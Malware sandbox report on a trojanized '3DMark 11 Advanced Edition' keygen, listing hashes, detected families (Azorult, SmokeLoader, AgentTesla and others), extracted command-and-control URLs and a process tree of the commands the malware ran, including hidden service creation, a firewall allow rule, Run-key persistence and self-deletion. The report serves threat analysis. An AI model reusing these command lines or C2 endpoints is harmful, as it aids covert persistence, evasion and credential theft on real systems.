Overview

overview

10

Static

static

8

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

3

ฺฺฺK...ฺฺ

windows10_x64

4

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

4

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

3

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

1

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

  • max time kernel
    538s
  • max time network
    542s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-11-2020 17:26

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    3DMark 11 Advanced Edition.exe

  • Size

    11.6MB

  • MD5

    236d7524027dbce337c671906c9fe10b

  • SHA1

    7d345aa201b50273176ae0ec7324739d882da32e

  • SHA256

    400b64f8c61623ead9f579b99735b1b0d9febe7c829e8bdafc9b3a3269bbe21c

  • SHA512

    e5c2f87923b3331719261101b2f606298fb66442e56a49708199d8472c1ac4a72130612d3a9c344310f36fcb3cf39e4637f7dd8fb3841c61b01b95bb3794610a

Score
10/10
agentteslaazorultplugxredlinesmokeloadertofseexmrigbackdoorbootkitdiscoveryevasioninfostealerkeyloggermacrominerpersistencespywarestealertrojanupxvmprotect

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://vintrsi.com/upload/

http://woatdert.com/upload/

http://waruse.com/upload/
rc4.i32
rc4.i32

Extracted

Family

smokeloader

Version

2019

C2

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

    trojanplugx
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • AgentTesla Payload 2 IoCs
    keyloggerstealer
  • XMRig Miner Payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 61 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Suspicious Office macro 2 IoCs

    Office document equipped with 4.0 macros.

    macro
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 30 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spyware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 5 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • JavaScript code in executable 9 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 5 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 162 IoCs
    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 41 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Checks SCSI registry key(s) 3 TTPs 117 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Kills process with taskkill 5 IoCs
    evasion
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 7 IoCs
  • Modifies registry class 181 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4606 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 341 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SetWindowsHookEx 26 IoCs
  • Suspicious use of WriteProcessMemory 375 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe
    "C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3892
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:196
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
        intro.exe 1O5ZF
        3⤵
        • Executes dropped EXE
        PID:3492
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3556
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3480
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
              PID:3948
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          3⤵
          • Executes dropped EXE
          PID:3372
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
          keygen-step-2.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2472
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3296
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1
              5⤵
              • Runs ping.exe
              PID:3968
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:784
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1788
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              5⤵
              • Runs ping.exe
              PID:1608
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1124
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            PID:3668
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:808
            • C:\Users\Admin\AppData\Local\Temp\sibD887.tmp\0\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\sibD887.tmp\0\setup.exe" -s
              5⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3844
              • C:\Program Files (x86)\9ku5npt6tedk\aliens.exe
                "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
                6⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Writes to the Master Boot Record (MBR)
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Modifies system certificate store
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2744
                • C:\Windows\SysWOW64\msiexec.exe
                  msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
                  7⤵
                  • Enumerates connected drives
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:3728
                • C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe
                  C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 0011 installp1
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks whether UAC is enabled
                  • Writes to the Master Boot Record (MBR)
                  • Suspicious use of SetThreadContext
                  • Checks SCSI registry key(s)
                  • Suspicious use of SetWindowsHookEx
                  PID:3904
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:996
                  • C:\Users\Admin\AppData\Roaming\1605724107184.exe
                    "C:\Users\Admin\AppData\Roaming\1605724107184.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605724107184.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:2084
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:8
                  • C:\Users\Admin\AppData\Roaming\1605724112638.exe
                    "C:\Users\Admin\AppData\Roaming\1605724112638.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605724112638.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:2208
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:2884
                  • C:\Users\Admin\AppData\Roaming\1605724119796.exe
                    "C:\Users\Admin\AppData\Roaming\1605724119796.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605724119796.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:184
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:1204
                  • C:\Users\Admin\AppData\Roaming\1605724122904.exe
                    "C:\Users\Admin\AppData\Roaming\1605724122904.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605724122904.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:2108
                  • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
                    C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:3568
                  • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
                    "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Writes to the Master Boot Record (MBR)
                    • Suspicious use of SetWindowsHookEx
                    PID:2292
                  • C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe
                    C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:3616
                    • C:\Users\Admin\AppData\Local\Temp\is-ELEOD.tmp\1021C014A4C9A552.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-ELEOD.tmp\1021C014A4C9A552.tmp" /SL5="$9005C,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent
                      9⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      PID:632
                      • C:\Program Files (x86)\RearRips\seed.sfx.exe
                        "C:\Program Files (x86)\RearRips\seed.sfx.exe" -pK2j8l614 -s1
                        10⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        PID:3392
                        • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                          "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                          11⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          PID:3744
                      • C:\Windows\SysWOW64\cmd.exe
                        "cmd.exe" /c "start https://iplogger.org/14Ahe7"
                        10⤵
                        • Checks computer location settings
                        PID:2164
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"
                    8⤵
                      PID:1672
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 127.0.0.1 -n 3
                        9⤵
                        • Runs ping.exe
                        PID:3772
                  • C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe
                    C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 200 installp1
                    7⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Writes to the Master Boot Record (MBR)
                    • Checks SCSI registry key(s)
                    • Suspicious use of SetWindowsHookEx
                    PID:2120
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      8⤵
                        PID:2152
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          9⤵
                          • Kills process with taskkill
                          PID:2228
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"
                        8⤵
                          PID:2072
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1 -n 3
                            9⤵
                            • Runs ping.exe
                            PID:3016
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
                        7⤵
                          PID:2640
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1 -n 3
                            8⤵
                            • Runs ping.exe
                            PID:2652
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
                    4⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2204
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"
                    4⤵
                    • Executes dropped EXE
                    PID:3840
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      5⤵
                        PID:3836
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          6⤵
                          • Kills process with taskkill
                          PID:3144
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"
                      4⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:1896
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        5⤵
                        • Executes dropped EXE
                        PID:648
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:484
              • C:\Windows\system32\msiexec.exe
                C:\Windows\system32\msiexec.exe /V
                1⤵
                • Enumerates connected drives
                • Modifies service
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1656
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding 397B98C37739E2A1C53A5EA422363376 C
                  2⤵
                  • Loads dropped DLL
                  PID:2468
                • C:\Windows\system32\srtasks.exe
                  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                  2⤵
                  • Modifies service
                  PID:504
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Modifies service
                PID:1992
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                1⤵
                • Drops file in Windows directory
                • Modifies Control Panel
                • Modifies Internet Explorer settings
                • Modifies registry class
                • Suspicious use of SetWindowsHookEx
                PID:3052
              • C:\Windows\system32\browser_broker.exe
                C:\Windows\system32\browser_broker.exe -Embedding
                1⤵
                • Modifies Internet Explorer settings
                PID:1892
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                1⤵
                • Checks SCSI registry key(s)
                • Modifies data under HKEY_USERS
                PID:3096
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:1852
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies Internet Explorer settings
                • Modifies registry class
                PID:936
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                PID:4464
              • C:\Windows\system32\compattelrunner.exe
                C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                1⤵
                  PID:4856
                • C:\Program Files (x86)\gdiview\gdiview\GDIView.exe
                  "C:\Program Files (x86)\gdiview\gdiview\GDIView.exe"
                  1⤵
                  • Executes dropped EXE
                  PID:4972
                • C:\Users\Admin\AppData\Local\Temp\F507.exe
                  C:\Users\Admin\AppData\Local\Temp\F507.exe
                  1⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Modifies system certificate store
                  PID:5012
                  • C:\Windows\SysWOW64\icacls.exe
                    icacls "C:\Users\Admin\AppData\Local\57ba5e41-26ac-4ea5-b825-02d55656fa0c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                    2⤵
                    • Modifies file permissions
                    PID:1892
                  • C:\Users\Admin\AppData\Local\Temp\F507.exe
                    "C:\Users\Admin\AppData\Local\Temp\F507.exe" --Admin IsNotAutoStart IsNotTask
                    2⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    PID:1644
                    • C:\Users\Admin\AppData\Local\dd688d57-c6a5-420b-a67c-91775774fb13\updatewin1.exe
                      "C:\Users\Admin\AppData\Local\dd688d57-c6a5-420b-a67c-91775774fb13\updatewin1.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4948
                    • C:\Users\Admin\AppData\Local\dd688d57-c6a5-420b-a67c-91775774fb13\updatewin2.exe
                      "C:\Users\Admin\AppData\Local\dd688d57-c6a5-420b-a67c-91775774fb13\updatewin2.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:1464
                    • C:\Users\Admin\AppData\Local\dd688d57-c6a5-420b-a67c-91775774fb13\5.exe
                      "C:\Users\Admin\AppData\Local\dd688d57-c6a5-420b-a67c-91775774fb13\5.exe"
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:4960
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\dd688d57-c6a5-420b-a67c-91775774fb13\5.exe & exit
                        4⤵
                          PID:3520
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im 5.exe /f
                            5⤵
                            • Kills process with taskkill
                            PID:5000
                  • C:\Users\Admin\AppData\Local\Temp\F66F.exe
                    C:\Users\Admin\AppData\Local\Temp\F66F.exe
                    1⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:5032
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /im F66F.exe /f & erase C:\Users\Admin\AppData\Local\Temp\F66F.exe & exit
                      2⤵
                        PID:4832
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im F66F.exe /f
                          3⤵
                          • Kills process with taskkill
                          PID:4764
                    • C:\Users\Admin\AppData\Local\Temp\F855.exe
                      C:\Users\Admin\AppData\Local\Temp\F855.exe
                      1⤵
                      • Executes dropped EXE
                      PID:5060
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\zlfkbdup\
                        2⤵
                          PID:2012
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gjpjyjua.exe" C:\Windows\SysWOW64\zlfkbdup\
                          2⤵
                            PID:4572
                          • C:\Windows\SysWOW64\sc.exe
                            "C:\Windows\System32\sc.exe" create zlfkbdup binPath= "C:\Windows\SysWOW64\zlfkbdup\gjpjyjua.exe /d\"C:\Users\Admin\AppData\Local\Temp\F855.exe\"" type= own start= auto DisplayName= "wifi support"
                            2⤵
                              PID:4472
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\System32\sc.exe" description zlfkbdup "wifi internet conection"
                              2⤵
                                PID:4080
                              • C:\Windows\SysWOW64\sc.exe
                                "C:\Windows\System32\sc.exe" start zlfkbdup
                                2⤵
                                  PID:4552
                                • C:\Windows\SysWOW64\netsh.exe
                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                  2⤵
                                    PID:4448
                                • C:\Users\Admin\AppData\Local\Temp\FC3E.exe
                                  C:\Users\Admin\AppData\Local\Temp\FC3E.exe
                                  1⤵
                                  • Executes dropped EXE
                                  PID:5088
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\Temp\FC3E.exe
                                    2⤵
                                      PID:4148
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 3
                                        3⤵
                                        • Delays execution with timeout.exe
                                        PID:992
                                  • C:\Users\Admin\AppData\Local\Temp\BB0.exe
                                    C:\Users\Admin\AppData\Local\Temp\BB0.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2212
                                  • C:\Users\Admin\AppData\Local\Temp\1527.exe
                                    C:\Users\Admin\AppData\Local\Temp\1527.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:2832
                                    • C:\Users\Admin\AppData\Local\Temp\anon.exe
                                      "C:\Users\Admin\AppData\Local\Temp\anon.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:5024
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v videodriver /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\videodriver.exe"
                                        3⤵
                                          PID:4256
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v videodriver /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\videodriver.exe"
                                            4⤵
                                            • Adds Run key to start application
                                            PID:4328
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\videodriver.exe
                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\videodriver.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:3236
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "cmd.exe" /C ping 127.0.0.1 -n 3 > nul & del ""
                                        2⤵
                                          PID:4428
                                          • C:\Windows\SysWOW64\PING.EXE
                                            ping 127.0.0.1 -n 3
                                            3⤵
